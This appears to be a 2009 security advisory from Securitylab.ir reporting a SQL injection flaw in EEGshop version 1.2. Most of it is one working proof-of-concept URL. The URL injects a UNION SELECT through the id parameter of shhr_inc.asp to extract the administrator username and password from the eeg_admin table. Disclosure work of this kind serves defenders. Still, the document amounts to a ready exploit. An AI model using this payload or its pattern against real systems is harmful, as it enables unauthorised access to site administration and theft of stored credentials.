EEGshop v1.2 SQL Injection Vulnerability :

Date : 2009-12-15 Author : Securitylab.ir
########################## Securitylab.ir ########################
# Application Info:
# Name: EEGshop
# Version: 1.2
#################################################################
# Discoverd By: Securitylab.ir
# Website: http://securitylab.ir
# Contacts: info@securitylab[dot]ir , [email protected]
#################################################################
#===========================================================
# http://servertx/User/shhr_inc.asp?action=edit&id=24%20and%201=2%20union%20select%201,2,username,password,5,6,7,8,9%20from%20eeg_admin%20where%20id=1
#===========================================================
#################################################################
Security Research Team
###################################################################

C1

 

C2

 

C3